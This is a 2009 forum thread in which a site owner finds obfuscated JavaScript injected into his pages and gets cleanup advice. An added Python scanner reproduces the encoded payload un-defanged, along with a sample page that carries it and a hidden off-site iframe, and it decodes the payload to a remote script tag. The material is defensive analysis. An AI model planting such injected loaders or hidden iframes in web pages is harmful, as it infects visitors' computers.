Web site compromised?

Discussion in 'Computer Security' started by Kompu Kid, Apr 22, 2009.

  1. Kompu Kid

    Kompu Kid Guest

    Hello All:

    A website I manage seems to have a problem when I tried to access it
    today with Chrome browser.

    Chrome gives the following warning:


    "Warning: Visiting this site may harm your computer!
    The website at www.XXXX.YYY (I am not giving the actual URL) contains
    elements from the site beebest.cn, which appears to host malware –
    software that can hurt your computer or otherwise operate without your
    consent. Just visiting a site that contains malware can infect your
    computer.
    For detailed information about the problems with these elements, visit
    the Google Safe Browsing diagnostic page for beebest.cn.
    Learn more about how to protect yourself from harmful software online.
    I understand that visiting this site may harm my computer. "

    How can "elements" from beebest.cn be on this site? What do
    "elements" mean in this case?

    I am downloading the site and will do a text search for "beebest" .

    Any other recommendations?

    Thanks

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #1

  2. Kompu Kid

    Kompu Kid Guest

    I just had a friend try to access my website. He got the same message
    except the beebest.cn was replaced by www.corpamata.cn.

    What is going on?

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #2

  3. Kompu Kid

    Martin Guest

    Dunno, but if it were my site I'd be looking to sack the webmaster
    because he doesn't seem to know what he's doing.

    Post the frigging site and you might get a decent answer from someone
    who bothers to go and look at the code.
     
    Martin, Apr 22, 2009
    #3
  4. Kompu Kid

    Kompu Kid Guest

    These guys are complaining about the same thing. However, some are
    finding no problems...

    http://www.greenockmorton.org/forum/index.php?showtopic=26972

    Deguza
     
    Kompu Kid, Apr 22, 2009
    #4
  5. Kompu Kid

    1PW Guest

    Hello Deguza:

    I too believe we should be dealing with specifics. Please reply with
    your site's true and complete URL in the form of:

    <hxxp://www.xxxx.yyy/>
    ^^

    In the meantime, you may wish to see if your application software is
    updated to the latest possible versions so as to have all possible
    security holes plugged. If you also manage the website's OS please post
    a great deal of detail on its state of revision. It wouldn't hurt to
    give us the ISP so we don't have to dig for it. Do you also maintain
    its hardware?

    Warm regards,

    Pete
     
    1PW, Apr 22, 2009
    #5
  6. Kompu Kid

    John Holmes Guest

    Kompu Kid "contributed" in alt.hacker:
    Don't expect any help then.
     
    John Holmes, Apr 22, 2009
    #6
  7. Kompu Kid

    Kompu Kid Guest

    No, it does not use SQL queries.

    I found this in one of the pages. I have not put this in there, unless
    FrontPage, or the webhosting software put it in.

    Or it could be the infection (I am putting "-"s in some of the key
    words just in case it tries to execute on the web...):

    <s-c-ript la-ngu-age=ja-va-script><!--
    do-cu-ment.w-rite(-u-n-e-s-c-a-p-e('ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F
    %2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu
    %3EvN6%3C%2Fscriptlh%3E').rep-la-ce(/lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|
    ii/g,""));
    --></script><body>
     
    Kompu Kid, Apr 22, 2009
    #7
  8. Kompu Kid

    Kompu Kid Guest

    I did not want anybody getting infected, that's why I did not give it
    out.

    Deguza
     
    Kompu Kid, Apr 23, 2009
    #8
  9. Kompu Kid

    Todd H. Guest

    PHP forums ...

    I lack the time to go there and triage it, but PHP is quite a
    playground, and forums even more so. Probably some sort of script
    injection attack if not a complete compromise.
     
    Todd H., Apr 23, 2009
    #9
  10. Kompu Kid

    Gandalf Parker Guest

    Do you have any dynamic content?
    Do you run banner ads that are not on your machine but are links to another
    machine?
    Do you include google keyword advertising?
    Do you have a link to a webring at the bottom of the webpage?

    Gandalf Parker
     
    Gandalf Parker, Apr 23, 2009
    #10
  11. Kompu Kid

    Kompu Kid Guest

    UPDATE:

    * I found also a My hosting service told me that an infection on my
    personal computer is probably where the injection of suspect code
    started. He says the virus on my computer used the ftp link I
    have to the web hosting site.

    * In addition to the script I gave earlier, I found on some pages
    another piece of code that had an "iframe" html command. The iframe
    was referring to a Chinese site "betwager". I am not able to write the
    full code and the site. Google won't let me post it.
     
    Kompu Kid, Apr 23, 2009
    #11
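    The two injections described in this thread (the obfuscated
    document.write(unescape(...).replace(...)) block in post #7 and the
    hidden iframe in post #11) are the sort of thing the poster's planned
    "download the site and text-search it" would miss, because the hostile
    host never appears in clear text. The script below is an added example
    written for this page, not code from the thread or from any of the
    posters: it reproduces what the browser would build from the encoded
    blob (percent-decode, then strip the junk tokens with the same
    leftmost-first regex semantics as the JavaScript), and scans saved
    pages for that pattern, for hidden iframes pointing off-site, and for
    scripts loaded from a bare IP address. The encoded blob is copied from
    post #7 with the poster's "-" defanging removed; the surrounding HTML
    and the iframe host `malware.example.invalid` are constructed for the
    example, and the function names are my own.

```python
"""Scan saved HTML files for injected markup and decode the
document.write(unescape(...).replace(/junk/g,"")) obfuscation."""
from __future__ import annotations

import re
import sys
from pathlib import Path
from urllib.parse import unquote

# Encoded blob and junk-token list as posted in the thread (defanging removed).
PAYLOAD = (
    "ii%3CscriiipzIlt%20lhsCEtrgKc%3D%2F%2F940Cm%2E24Joq7%2Emeu2%2EgK19vN65gK"
    "%2FjzIlqulhevN6ryii%2ECEtjCEtsmeu%3EvN6%3C%2Fscriptlh%3E"
)
TOKENS = "lh|vN6|meu|0Cm|Joq|zIl|CEt|pTv|gK|ii"

# Constructed sample page: the real obfuscated script plus a made-up hidden
# iframe (placeholder host) and one legitimate local script for contrast.
SAMPLE_HTML = f"""<html><head><title>Club news</title></head>
<script language=javascript><!--
document.write(unescape('{PAYLOAD}').replace(/{TOKENS}/g,""));
--></script><body>
<p>Welcome to the site.</p>
<iframe src="http://malware.example.invalid/in.cgi" width=1 height=1 style="visibility:hidden"></iframe>
<script src="/js/menu.js"></script>
</body></html>"""

# unescape('<blob>').replace(/<tokens>/g,"")  -> groups 2 (blob) and 3 (tokens)
WRITE_UNESCAPE = re.compile(
    r"""unescape\(\s*(['"])([^'"]*)\1\s*\)\s*\.replace\(\s*/([^/]+)/g\s*,\s*(['"])\4\s*\)""",
    re.IGNORECASE,
)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
EXTERNAL_SRC = re.compile(r"""src\s*=\s*["']?(?:https?:)?//""", re.IGNORECASE)
BARE_IP = re.compile(r"^(?:https?:)?//\d{1,3}(?:\.\d{1,3}){3}(?:[/:]|$)")
HIDDEN = re.compile(
    r"""width\s*=\s*["']?[01]\b|height\s*=\s*["']?[01]\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)


def decode_write_unescape(js: str) -> list[str]:
    """Return the markup each unescape/replace construct would write.

    JS unescape() maps %XX to the Latin-1 character, so decode with latin-1;
    the junk tokens are used verbatim as a regex, exactly as the script does,
    and Python's alternation picks the leftmost, first-listed match like JS.
    """
    decoded_blocks = []
    for m in WRITE_UNESCAPE.finditer(js):
        text = unquote(m.group(2), encoding="latin-1")
        junk = re.compile(m.group(3))
        decoded_blocks.append(junk.sub("", text))
    return decoded_blocks


def find_injections(html: str) -> list[tuple[str, str]]:
    """Classify suspicious markup in one page as (kind, detail) pairs."""
    findings = []
    for decoded in decode_write_unescape(html):
        findings.append(("obfuscated document.write", decoded))
        # The decoded markup is what the visitor actually loads; inspect it too.
        for src in SCRIPT_SRC.findall(decoded):
            findings.append(("remote script in decoded payload", src))
    for tag in IFRAME.findall(html):
        if HIDDEN.search(tag) and EXTERNAL_SRC.search(tag):
            findings.append(("hidden external iframe", tag))
    for src in SCRIPT_SRC.findall(html):
        if BARE_IP.match(src):
            findings.append(("script loaded from bare IP", src))
    return findings


def scan_tree(root: Path) -> dict[str, list[tuple[str, str]]]:
    """Walk a downloaded site copy and report every file with findings."""
    results = {}
    for path in root.rglob("*"):
        if path.suffix.lower() in {".htm", ".html", ".php", ".js"}:
            hits = find_injections(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python scan_injections.py /path/to/site-copy
        for path, hits in scan_tree(Path(sys.argv[1])).items():
            print(path)
            for kind, detail in hits:
                print(f"  {kind}: {detail}")
    else:
        for kind, detail in find_injections(SAMPLE_HTML):
            print(f"{kind}: {detail}")
```

    Run against the downloaded copy of the site, the script prints the
    decoded tag for every obfuscated block, which is what tells you which
    remote host the injected script actually pulls from; a page that decodes
    to a bare-IP script source or carries a 1x1 hidden iframe is a page to
    restore from a known-clean backup, after the FTP credentials that were
    used to plant it have been changed.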
  12. Kompu Kid

    Kompu Kid Guest

    It seems like I need to install a newsreader on my computer to use the
    "".

    Outlook volunteered when I put that in my Chrome's address area, but
    I do not want to use it.

    Any recommendations for a news reader for the XP environment? If it
    matters, I use Firefox in addition to chrome.

    Deguza
     
    Kompu Kid, Apr 24, 2009
    #12
  13. Kompu Kid

    Todd H. Guest

    Much agreed. PHP is so porous that it's much more likely to be a
    direct attack on your site rather than some convoluted "trojan on your
    computer that modifies local html and then magically knows what FTP
    client you're using, reuses its cached password for the site and loads
    the modified html onto the remote site."

    The target audience for such a client side sploit is so small it
    wouldn't be worthwhile.

    visit http://www.securityfocus.com/vulnerabilities

    and for each of the following, chase down what vulns there are for it
    for the version of each your site is running

    Web server version (apache whatever likely)
    php version on the server
    what php forum script you're using / version


    And see what vulns are in each for the versions you have, and that'll
    whittle down the "how" in what happened perhaps.
     
    Todd H., Apr 24, 2009
    #13
  14. Kompu Kid

    ©Ari® Guest

    LOL
     
    ©Ari®, Apr 24, 2009
    #14
  15. Kompu Kid

    DGB Guest

    Can you/will you expand on your comment, ©Ari® ?

    Thanks
     
    DGB, Apr 24, 2009
    #15
  16. Kompu Kid

    Doc Guest

    If you're posting a message in a hacker forum with a warning that you
    think the site might be compromised, then the people who look at it are
    forewarned.

    Not posting the URL is stupid. People who can do low-tech stuff like
    telnet to the server and download the page for analysis can't do that if
    they don't know where it is.

    It's like telling someone you think you have an STD, but not going to the
    doctor to really find out.



    Doc.
     
    Doc, Apr 24, 2009
    #16
  17. Kompu Kid

    Doc Guest

    I still like X-News.

    http://download.cnet.com/Xnews/3000-2164_4-10026377.html

    Really should download and try the latest version, but the one I have just
    works - no attempts to execute code or render pages, so very safe.


    Doc.
     
    Doc, Apr 24, 2009
    #17
  18. Kompu Kid

    John Holmes Guest

    Kompu Kid "contributed" in alt.hacker:
    I'll second Doc.

    Most of the regulars here know what they're doing. FYI, my system will
    not get infected by just browsing to a compromised website.
     
    John Holmes, Apr 25, 2009
    #18
  19. Kompu Kid

    ~BD~ Guest

    Hello John :)

    Please will you explain how/why *your* system will not be so infected
    yet other folk may be?

    Might it simply be because you aren't using Microsoft Windows?
     
    ~BD~, Apr 25, 2009
    #19
  20. Kompu Kid

    John Holmes Guest

    ~BD~ "contributed" in alt.hacker:
    As a matter of fact, I'm using WinXP for my daily use. My 5 workstations
    and 4 wireless laptops (some XP, some Slackware) are all behind 2 Windows
    2008 DC's running ISA server and Forefront. That setup keeps my local
    network free of mal/spy-ware, viruses and other nasties. The servers are
    really in use as servers, i.e. nobody touches them but me and no websites
    are ever visited on them.

    I hope my answer satisfied you.
     
    John Holmes, Apr 25, 2009
    #20